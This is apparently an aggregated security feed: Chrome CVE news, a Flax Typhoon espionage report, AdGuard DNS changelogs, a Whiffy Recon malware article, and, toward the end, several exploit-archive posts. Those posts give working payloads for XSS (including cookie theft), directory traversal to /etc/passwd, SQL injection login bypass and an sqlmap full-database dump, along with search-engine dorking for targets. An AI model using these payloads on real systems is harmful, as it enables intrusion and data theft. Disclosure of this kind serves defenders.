Categories: Exploits and vulnerabilities
Tags: stable channel

Tags:  weekly updates

Tags:  CVE-2023-4427

Tags:  CVE-2023-4428

Tags:  CVE-2023-4429

Tags:  CVE-2023-4430

Tags:  CVE-2023-4431

Tags:  use after free

Tags:  out of bounds

Tags:  heap corruption

The first of Chrome's now weekly security updates fixes five vulnerabilities.



(Read more...)




The post Update now! Google Chrome's first weekly update has arrived appeared first on Malwarebytes Labs.

Google has published details about the first weekly update for the Chrome browser. Recently Google announced that it would start shipping weekly security updates for the Stable channel (the version most of us use). Regular Chrome releases will still come every four weeks, but to get security fixes out faster, updates to address security and other high impact bugs will be scheduled weekly.

This should also help in the reduction of a patch gap in the Chome release cycle. When a Chrome security bug is fixed, the fix is added to the public Chromium source code repository. The fix is then tested and evaluated before it goes to the Stable Channel. The gap is the time between the patch appearing in the Chromium repository and it being shipped in a Stable channel update.

The latest update has fixes for five vulnerabilities. Four of these vulnerabilities have been classified with a High importance and one as Medium. All these vulnerabilities have been reported by external researchers between August 1 and August 7, 2023.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are:

CVE-2023-4430, a use after free (UAF) vulnerability in Vulkan, in Google Chrome prior to 116.0.5845.110, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. Vulkan is a modern cross-platform graphics and compute API (application programming interface) that provides high-efficiency, low-level access to modern GPUs (graphics processing units) used in a wide variety of devices from PCs to smartphones.

UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program.

CVE-2023-4429 is another use after free vulnerability, this time in Loader, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to potentially exploit heap corruption via a crafted HTML page.

CVE-2023-4428 is an out of bounds memory access in CSS, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions.

CVE-2023-4427 is an out of bounds memory access in V8, Google’s open-source JavaScript engine, in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

CVE-2023-4431 is the vulnerability listed as Medium severity. It's an out of bounds memory access vulnerability in Fonts in Google Chrome prior to 116.0.5845.110, which allows a remote attacker to perform an out of bounds memory read via a crafted HTML page.

**How to protect yourself**

If you’re a Chrome user on Windows, Mac, or Linux, you should update  to version 116.0.5845.110/.111 at your earliest convenience.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is **relaunch** the browser in order for the update to complete.

_Google Chrome is up to date_

After the update, your version should be 116.0.5845.110 for Mac and Linux, and 116.0.5845.111 for Windows, or later.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Google Chrome's first weekly update has arrived

A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign.
The Microsoft Threat Intelligence team is tracking the activity under the name Flax Typhoon, which is also known as Ethereal Panda.
"Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal

A nation-state activity group originating from China has been linked to cyber attacks on dozens of organizations in Taiwan as part of a suspected espionage campaign.

The Microsoft Threat Intelligence team is tracking the activity under the name **Flax Typhoon**, which is also known as Ethereal Panda.

"Flax Typhoon gains and maintains long-term access to Taiwanese organizations' networks with minimal use of malware, relying on tools built into the operating system, along with some normally benign software to quietly remain in these networks," the company said.

It further said it hasn't observed the group weaponize the access to conduct data-collection and exfiltration. A majority of the targets include government agencies, educational institutions, critical manufacturing, and information technology organizations in Taiwan.

A smaller number of victims have also been detected in Southeast Asia, North America, and Africa. The group is suspected to have been active since mid-2021.

"Ethereal Panda operations primarily focus on entities in the academic, technology, and telecommunications sectors in Taiwan," CrowdStrike notes in its description of the hacker crew. "Ethereal Panda relies heavily on SoftEther VPN executables to maintain access to victim networks, but has also been observed deploying the GodZilla web shell."

The primary focus of the actor revolves around persistence, lateral movement, and credential access, with the actor employing living-off-the-land (LotL) methods and hands-on keyboard activity to realize its goals.

The modus operandi is in line with threat actors' practice of continually updating their approaches to evade detection, banking on available tools in the target environment to avoid unnecessary download and creation of custom components.

Initial access is facilitated by means of exploiting known vulnerabilities in public-facing servers and deploying web shells like China Chopper, followed by establishing persistent access over Remote Desktop Protocol (RDP), deploy a VPN bridge to connect to a remote server, and harvest credentials using Mimikatz.

A noteworthy aspect of the attacks is the modification of the Sticky Keys behavior to launch Task Manager, enabling Flax Typhoon to conduct post-exploitation on the compromised system.

"In cases where Flax Typhoon needs to move laterally to access other systems on the compromised network, the actor uses LOLBins, including Windows Remote Management (WinRM) and WMIC," the Windows maker said.

The development comes three months after Microsoft exposed another China-linked actor named Volt Typhoon (aka Bronze Silhouette or Vanguard Panda), which has been observed exclusively relying on LotL techniques to fly under the radar and exfiltrate data.

While crossover of tactics and infrastructure among threat actors operating out of China isn't unusual, the findings paint the picture of a constantly evolving threat landscape, with adversaries shifting their tradecraft to become more selective in their follow-on operations.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

China-Linked Flax Typhoon Cyber Espionage Targets Taiwan's Key Sectors

AdGuard DNS before 2.2 allows remote attackers to cause a denial of service via malformed UDP packets.

AdGuard DNS versions

2.2.1

Aug 7, 2023

In this update, we have improved the DNS server performance, fixed a few issues, and released a new authorization service that will allow users to access their personal account quicker.

Changelog

Performance

The number of AdGuard DNS users is growing at an enormous rate, and the total number of requests per second has closely approached 2 million. Meanwhile, over 90% of these requests come to us through encrypted DNS protocols (DoT, DoH, DoQ, DNSCrypt). Therefore, in this release, we focused on improving the DNS server’s performance and achieved great success. We can now handle an astronomical number of requests with reasonable server power.

Features

Added Czech and Slovak languages

Improved readability of highlighted text in dark theme #617

Full DNS address now displayed when setting up a device in a mobile browser #625

Fixes

Misalignment of columns when the “Device not connected” indicator dot appears #575

AdGuard verification code auto-fill issue with two-factor authentication enabled in Safari #314

Email address auto-fill bug on the login page in Safari #319

Incorrect functioning of the $dnsrewrite modifier

2.2

Apr 24, 2023

The highlight of this release is the ability to customize the Team subscription — now you can choose the number of devices, servers, and monthly requests you want before purchasing it. Also, we've added the option to select a response code for blocked requests and, of course, fixed some bugs.

Changelog

Features

Added the ability to customize the Team subscription

Added more information about monthly traffic update #490

Added the option to select a response code for blocked requests

Added AdGuard DNS blog

Updated Linked IP block design

Updated translations #570

Fixes

In the mobile version of Safari, the filtering log automatically reverts to its default state after scrolling

Problem with statistics and log retention settings #472

EDNS Client Subnet could not be disabled #542

Error condition is not reset when the type of line to be added is changed #563

Slashes are not saved in the comments of the user rules editor #576

Real-time query log updates don't retain filter changes #460

Fixed an issue that allowed a DoS attack against the service using malformed UDP packets

2.1.6

Mar 1, 2023

Minor bugs should be tackled before they build up and affect the performance of AdGuard DNS. We aim to release patches in a timely fashion, and here's another one.

Changelog

Fixed

Can't reach the 'Try AdGuard DNS' button in Safari on iOS #436

The settings of the selected server are reset after refreshing the page

The domain is not found in the search field if it was copy-pasted #530

Changed the hint text for clearing device logs/statistics #536

Added

Default TTL hint #535

Ability to customize which response will be used for a blocked domain

Option to block Mozilla canary domain

2.1.5

Feb 2, 2023

In this patch we've fixed several bugs — now AdGuard DNS runs better.

Changelog

Fixed

Spikes on the stat graph

Incorrect triggering of the device limit

Resetting statistics does not occur in all filter sections

Unable to log in to account via Apple ID if 2FA is enabled

Top blocked domains and top requested domains values in mobile version are mixed up #482

Resetting filters in filtering log does not clear domain search field #524

2.1.4

Dec 29, 2022

This patch is a little New Year’s present for you. We’ve significantly improved the performance of our DNS servers, added instructions for connecting AdGuard DNS to AdGuard VPN and AdGuard Browser extension, and fixed minor bugs.

2.1.3

Dec 7, 2022

Now it’s possible to connect an Android or iOS device with AdGuard VPN to AdGuard DNS via email. To do so:

Open the AdGuard DNS dashboard and tap the Connect new device button,

Choose Android or iOS and enter your device’s name,

Tap Next and then Send link by email,

Enter the email address you want to send the link to and click Send,

​​Open the email on the device you want to connect to AdGuard DNS and tap the Connect device button.

For this release we’ve also expanded the list of used filters, made some UI enhancements, fixed a few bugs, and added Vietnamese localization.

Added

Option to connect AdGuard DNS in the AdGuard VPN app by sending a configuration email

Vietnamese language support

Added filters

1Hosts (mini)

HaGeZi Personal Black & White

HUN: Hufilter

LIT: EasyList Lithuania

No Google

Fixed

AdGuard DNS homepage doesn’t load when iCloud+ Private Relay is enabled

2.1.2

Nov 22, 2022

In AdGuard DNS v2.1.2 we’ve enhanced the dashboard interface, added a server in Johannesburg and an option to disable automatic filtering log updates. Also, we’ve fixed some bugs so it will no longer be a problem to rename the device or understand the statistical report.

If you use AdGuard VPN for Android or iOS, you can easily add an encrypted DNS to your device. Just follow our instructions when adding a new device.

Added

Option to disable automatic filtering log updates #264

Johannesburg server

Turkish language support

Fixed

Flags were displayed incorrectly in the Traffic Direction section#428

Blank space in the Connection check section #431

Text started to glitch when renaming a device #354

Incorrect dates in the weekly stats report

2.1.1

Oct 25, 2022

This hotfix is intended to correct minor errors and add two localizations as a bonus.

Changelog

\[Enhancement\] Added translation of the dashboard and login page into Portuguese and Portuguese Brazilian

\[Fixed\] Incorrect time of latest device activity #427

\[Fixed\] Incorrect VPN subscription status #352

\[Fixed\] Refreshing the Device settings page redirects back to server settings #430

2.1

Oct 20, 2022

AdGuard DNS now supports DNS-over-HTTP/3 in experimental mode. It was a challenge, but we made it. For now only AdGuard Home and dnsproxy fully support DNS-over-HTTP/3, but soon DoH3 will appear in other AdGuard products. However, we focus on DNS-over-QUIC and consider it more advanced, but we strive to support the other protocols too, and DoH3 is a proof of that.

Another good news is that we will email AdGuard DNS users weekly and monthly reports with stats on requests, devices, and companies, which is convenient and visual. If there are too many reports, you can unsubscribe at any time.

Changelog

\[Enhancement\] Added the Apply button that appears after changing the server name

\[Enhancement\] Query log data cutoff in desktop mode #366

\[Enhancement\] Query log page numbers move when a new page is opened #368

\[Fixed\] Switching from 90 days to anything less causes dates to overlap #323

\[Fixed\] Text is cut off for the last domain in Top domains #339

\[Fixed\] Dates are cut off on the left and right side of the chart (mobile version of the website) #341

\[Fixed\] Misleading subscription status (from AdGuard VPN) #352

\[Fixed\] Wrong status of applied unblocking rules #361

\[Fixed\] The "Refresh" button on the homepage does not override the number of requests

\[Fixed\] Query log data is cut off (desktop version of the website) #366

\[Fixed\] Limit triggering in Enterprise plan

\[Fixed\] Can't scroll to account settings on Safari for macOS #353

\[Fixed\] In some cases the statistics were counted incorrectly

\[Fixed\] Top Destinations stats overlap when set to 90 days #326

2.0.1

Sep 7, 2022

It's been two weeks since the release of AdGuard DNS 2.0, but there's still a pleasant aftertaste. We've been painstakingly working on this product to give you a reliable and convenient tool to control your online traffic. And we succeeded.

Still, small bugs had crept into the release. That's why we're publishing a patch today: so you can enjoy the service, and we can move on to some bigger tasks with peace of mind.

Changelog

\[Enhancement\] Added search to the DNS knowledge base

\[Enhancement\] Updated link for Contact Us button on purchase page

\[Enhancement\] Improved the Traffic Destinations page

\[Enhancement\] Add an option to use add-cpe-id in Dnsmasq to identify the device

\[Fixed\] Disabling logs disables tariff statistics

\[Fixed\] Numbers in Japanese, Korean, Chinese are displayed incorrectly

2.0

Aug 18, 2022

The beta testing phase is finally over! From now on the new level of traffic control is available for you. With AdGuard DNS 2.0 you can:

Flexibly configure domain blocking via blocklists, query log and user rules;  

See real-time requests statistics from all connected devices;  

Enable and set up Parental control;  

Learn more about all the changes and improvements of AdGuard DNS 2.0 in our blog.

0.6

Jul 29, 2022

Check out the sixth beta version of AdGuard DNS (and hopefully the final one before the release). In it we’ve improved the dark theme: updated the map styles and QR-code, so that everything could be easily read and scanned. And, of course, we fixed some minor bugs. The private AdGuard DNS now runs smoother!

Changelog

\[Enhancement\] Updated map styles in the dark theme

\[Enhancement\] Added an option to disable iCloud Private Relay

\[Fixed\] QR code is not scanned in the dark theme

\[Fixed\] Autofill doesn’t work in Safari on macOS and iOS

\[Fixed\] Minor bug fixes in desktop и mobile versions

0.5

Jul 13, 2022

There are five fingers in a hand, five oceans on Earth, and five betas of the private AdGuard DNS. Today we're releasing the fifth beta of our DNS and we hope you'll rate it 5/5!

In this version we’ve implemented support for DDR (Discovery of Designated Resolvers) by the latest draft of the new standard. With this feature, an encrypted connection to the DNS server will be set up automatically on devices with DDR support, provided the device previously knew the server address. A computer or smartphone will send a request to the known address and receive all the necessary information to establish a secure connection.

DDR support appeared in Windows 11 Insider Preview Build 22489, which means that the feature will get into the release version after a while. When this happens, Windows and AdGuard DNS users will be automatically reconnected to encrypted DNS servers – public or private, depending on the services selected earlier.

We’ve also improved ECS (EDNS Client Subnet) implemented in the third beta. Servers now respond with more precise IP addresses that better match your location. Furthermore, we are continuing to refine the open AdGuard DNS API, and now there are methods for getting statistics. All documentation is available at Knowledge Base.

We’ve fixed some bugs and worked on the interface: authorization via Apple ID now works properly, the dark theme has become really dark, and the Query log is prettier than ever. French, Italian, Chinese, Japanese, and Korean were added to the dashboard, and we are committed to continue localizing the private AdGuard DNS, making it accessible to users from all over the world!

Changelog

\[Enhancement\] Added support for DDR (Discovery of Designated Resolvers)

\[Enhancement\] Statistic retrieval methods were added to the API

\[Enhancement\] Added an option to change subscription type

\[Enhancement\] Added an option to extend subscription

\[Enhancement\] Added support for Chinese, Japanese, Korean, French, and Italian

\[Enhancement\] Added the "Don’t ask again" checkbox to the system notification that appears when deleting user rules

\[Fixed\] After logging in via Apple ID the personal account opens instead of dashboard if the user has an AdGuard VPN subscription

\[Fixed\] In dark theme statistics blocks are highlighted in white

\[Fixed\] In dark theme text in some fields is grayed out

\[Fixed\] Some elements in the mobile version of the website are displayed incorrectly

0.4

Jun 21, 2022

The period of active "building" of the private AdGuard DNS is left behind, and now we're polishing the service to a shine. Just take a look at the current changelog and compare it to the one we published for the previous beta. The difference is obvious.

The fourth beta features dark theme and language selection – at the moment, the dashboard is translated into German, Spanish, and Russian. To find both options, go to Account settings. And some more good news: from now on all AdGuard VPN users with a subscription will get the Personal plan of the private AdGuard DNS for free.

We hope you’ll enjoy the new version. Use the service and leave feedback on any platform you like.

Changelog

\[Enhancement\] Added dark theme

\[Enhancement\] Added support for VPN subscriptions and information about VPN subscribers automatically getting a Personal DNS subscription

\[Enhancement\] Added German and Spanish localizations

\[Enhancement\] Improved search function in the filter section on mobile devices

\[Enhancement\] Supplemented instructions for different devices

\[Enhancement\] Added a link to DNS rules syntax in the query log dialog

\[Fixed\] The “View device settings” button doesn't work on iOS devices

\[Fixed\] The “Unable to renew subscription” popup hangs for too long

0.3.1

Jun 10, 2022

The recently released third beta of private AdGuard DNS was really good and brought a lot of useful features to users. However, as it turned out, it contained a few flaws. So that you don't have to deal with them anymore, we are releasing a patch v0.3.1 for private AdGuard DNS.

Changelog

\[Fixed\] Clicking the Block button in Query log deletes all existing user rules and replaces them with a new one #265

\[Fixed\] Unable to move devices between servers #248

\[Fixed\] Incorrect links on the "Thanks for your purchase" page

\[Fixed\] Discount promo codes do not work correctly

\[Fixed\] There is no payment button in the mobile version of the website

\[Fixed\] Incorrect designation of the number of requests in Statistics

0.3

May 26, 2022

Meet the third beta version of private AdGuard DNS! We are steadily moving towards a full-fledged product, adding new features, changing and improving UI — everything to make you really enjoy using AdGuard DNS.

The version history – in front of your eyes

First and foremost, we've added a version history page for the AdGuard DNS service. Now you can see the full list of changes, learn about new features, and see how the work on private AdGuard DNS service is progressing.

Contribute to AdGuard DNS translation

Until now, private AdGuard DNS could only be used in English: first we had to make sure everything was working as it should. With this version we've extended the geography by adding the possibility to translate the dashboard into different languages. Help us make AdGuard DNS more accessible to everyone by participating in the translations! You can find a detailed article on how to use the Crowdin platform in our Knowledge Base. And if you already know how to use it, visit the AdGuard DNS project in Crowdin. Select the Dashboard and choose the language you want, then you're ready to translate!

AdGuard DNS Knowledge Base

Subscription

We've added a paid subscription on private AdGuard DNS. Subscription is not required during beta testing, but we'd appreciate it if you'd like to support us now.

DNS filters

We've also fixed DNS filters: eliminated the bug with the /etc/hosts-style rules failing to work and added support for rules with $dnsrewrite. By the way, you can read about the DNS filtering syntax in the Knowledge Base.

ECS support

The AdGuard DNS servers now support EDNS Client Subnet (ECS).

This feature allows users to get responses corrected for the location of the DNS user. We had long been hesitating to implement it in AdGuard DNS: ECS assumes handing over an anonymized user's IP address to the name server. In this version, we've solved the problem: instead of the user's IP address, we pass another address from approximately the same location as the user's.

New blocklists

We've added a lot of new blocklists — now it's even easier to customize AdGuard DNS. And if that's not enough, you can request and add more blocklists in the GitHub repository (before you do that, read requirements for blocklists in the section “What Blocklists Can Be Added Here”).

Open API

AdGuard DNS now has an open API. If you want to integrate with AdGuard DNS, read the documentation.

UI fixes and more

We've also fixed a lot of minor bugs and added some useful features.

Test private AdGuard DNS and leave feedback on any convenient platforms — it will help us become better.

Changelog

\[Enhancement\] Improved the appearance of the multiselect (element with the ability to select multiple values, such as countries, devices)

\[Enhancement\] For the device location, the Traffic Destination section uses data from its last activity

\[Fixed\] Incorrect detection for account time zone

\[Fixed\] Statistics and logs do not get cleared when their retention period is changed

\[Fixed\] Incorrect country detection for some domains

\[Fixed\] Significant delay in clearing logs and statistics

\[Other\] Added the option "Last 7 days" to date selector

0.2

Mar 16, 2022

We’ve all been waiting for it: we're proud to present the open beta of private AdGuard DNS! From now on, anyone can set up their own DNS server.

We took the best of AdGuard DNS and AdGuard Home and designed a product that would be flexible and customizable, meet the needs of "geeks", and have a user-friendly interface. We hope we succeeded! And now let's take a closer look at the best features of private AdGuard DNS.

Block/unblock domains

With a private DNS server, it is only you who decides which domains should be blocked and which shouldn’t — on each device! Connect your computer, smartphone, tablet or router and manage their requests as desired.

Blocklists management

You can also choose which domain blocking rules should be implemented. And those who aren't satisfied with dozens of pre-installed blocklists can import and export their own custom rules.

Advanced statistics

Now you can see the full statistics of your requests: how many requests were registered, to which companies, and to which countries. Besides, you can view this information for different dates, countries, and even for different devices connected to your DNS server. And of course, block and unblock requests on the go.

Parental control

To protect your child from online content you deem inappropriate, you can use Parental control. You can activate the safe search and manually specify domains for blocking as well as set the schedule: for instance, not allow your child to watch videos during homework.

Join beta testing

To take part in beta testing go to AdGuard DNS website and press \*Join beta\*\*\*, then sign up or log into your AdGuard account. You're done! Create your own DNS server and manage your requests — you are in control.

0.1

Sep 28, 2021

Great news: AdGuard DNS is advancing to a new level. We're about to release the product that many have yearned for so long — the private AdGuard DNS!

What a public DNS server blocks cannot be changed — it only has to be taken for granted. With your own DNS server, you'll be in control of all the query statistics and be able to choose which domains you want to block. It'll allow you to add blocklists and set up Parental control. And the user-friendly interface will make it no problem to get to grips with it all.

We added a new website where you can already see what the private AdGuard DNS interface will look like, learn how to connect to the public DNS server, and subscribe to the AdGuard DNS newsletter. If you do, we'll message you at launch and keep you up-to-date with the latest AdGuard news.

Thank you for your support! Stay tuned — and in the meantime, we're working to make sure the next release is to your liking.

CVE-2023-41173: AdGuard DNS — ad-blocking DNS server

By Deeba Ahmed
The new Whiffy Recon Malware was identified by cybersecurity researchers at Secureworks.
This is a post from HackRead.com Read the original post: Smoke Loader Botnet Drops Location Tracker Whiffy Recon Malware

**KEY FINDINGS**

*   A new custom, Wi-Fi scanning payload called Whiffy Recon has been detected.

*   Whiffy Recon is used by the Smoke Loader botnet to infect compromised devices.

*   Whiffy Recon triangulates the positions of infected devices using nearby Wi-Fi access points.

*   Whiffy Recon then uses the Google Geolocation API to get the device’s coordinates.

*   Whiffy Recon creates a wlan.Ink shortcut in the Startup folder to maintain persistence on the device.

*   The purpose of obtaining this information is unclear, but researchers suspect that it could be used to intimidate victims or pressure them to comply with demands.

The cybersecurity researchers at Secureworks have detected a new custom, Wi-Fi scanning payload that they have named Whiffy Recon. The malicious executable hunts for the geolocation of compromised systems – In the case of Whiffy Recon malware, the targeted devices are Windows based.

Secureworks’ Counter Threat Unit has shared details of a brand-new Smoke Loader botnet that infects compromised devices with a custom Wi-Fi scanning executable. They observed this malicious activity on 8th August 2023.

For your information, Smoke Loader, also known as Dofoil, is a type of botnet malware that is often used to deliver various payloads to compromised computers. It’s categorized as a downloader and is commonly associated with the distribution of other types of malware, such as banking Trojans, ransomware, and cryptocurrency miners.

Previously, in April 2019, the Smoke Loader botnet was found spreading a banking trojan to steal $4.6 million from victims. Another campaign exposed in July 2018, saw the use of the botnet to drop the Kronos banking trojan against unsuspecting victims.

As for the latest campaign; Whiffy Recon malware triangulates the positions of infected devices using any nearby Wi-Fi access points as its data point to access Google geolocation API. For your information, the Google Geolocation service triangulates a system’s location and returns coordinates using the mobile network and Wi-Fi access points data.

JSON-structured scan results in HTTPS POST request sent to Google Geolocation API. (Source: Secureworks)

According to Secureworks’ blog post, the payload starts its operation by scanning for the WLANSVC service on the compromised device. This is performed to confirm the Windows-based device has a wireless capability and exits if it isn’t present. It must be noted that Whiffy Recon only scans for the feature’s presence and not whether it is working or not.

It maintains persistence on the device by creating the wlan.Ink shortcut in the Startup folder that points to the Whiffy Recon malware’s exact location on the system. The malware’s main code has two loops- one of these registers the bot with the attacker’s C2 server and the other scans for Wi-Fi capability using the Windows WLAN API.

The second loop runs repeatedly with 60-second intervals to keep obtaining geolocation data. The scanning results are mapped to a JSON structure, which is transmitted to the Google Geolocation API through an HTTP Post request.

This information is then mapped to another JSON structure that contains information about every wireless access point present in that area, and the encryption methods these use.

What’s the purpose behind obtaining this information is still unclear to researchers. However, they suspect that attackers might want to “intimidate victims or pressure them to comply with demands.” Secureworks researchers urge organizations to use available controls and restrict access to Wi-Fi.

1.  Generation Z least likely to share their location data with Govt
2.  Researcher exposes how a US firm collected his location data
3.  Wikileaks Exposes CIA’s Linux Hacking, Geolocation Tracker Malware

Smoke Loader Botnet Drops Location Tracker Whiffy Recon Malware

GEN Security+ version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GEN Security+ v4.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ptcpay.com/                                                                                            || # Dork      : Powered by GeN4 Security+ 2.0                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Us3 P@yL04D: GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1[+] http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GEN Security+ 4.0 Cross Site Scripting

Geeklog version 2.1.0b1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Geeklog v2.1.0b1 Sql Injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.geeklog.net/                                                                                            || # Dork      : Powered by Geeklog                                                                                                 |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine.[+]  use Payload : calendar/index.php?view=day&day=05&month=10&year=2014 [+]  http://127.0.0.1/public_html/calendar/index.php?view=day&day=05&month=10&year=2014 (inject her)[+]  login : http://127.0.0.1/public_html/admin Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Geeklog 2.1.0b1 SQL Injection

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

User Registration and Login and User Management System version 3.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedDescriptionUser Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable toPersistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.POCUser side1. Go to the user registration page http://localhost/loginsystem.2. Enter <img src="x" onerror=alert(document.cookie)> in one of thefields (first name, last name, email, or contact).3. Click sign up.Admin side1. Login to admin panel http://localhost/loginsystem/admin.2. After login successfully go to manage user page.3. PayloadThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 Cross Site Scripting

User Registration and Login and User Management System version 3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedProof Of Concept:1. Navigate to the admin login page.URL: http://192.168.1.5/loginsystem/admin/2. Enter "*admin' -- -*" in the admin username field and anythingrandom in the password field.3. Now you successfully logged in as admin.4. To download all the data from the database, use the below commands.  4.1. Login to the admin portal and capture the request.  4.2. Copy the intercepted request in a file.  4.3. Now use the below command to dump all the dataCommand:  sqlmap -r <file-name> -p username -D loginsystem --dump-allThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 SQL Injection

Uvdesk version 1.1.4 suffers from a persistent cross site scripting vulnerability.

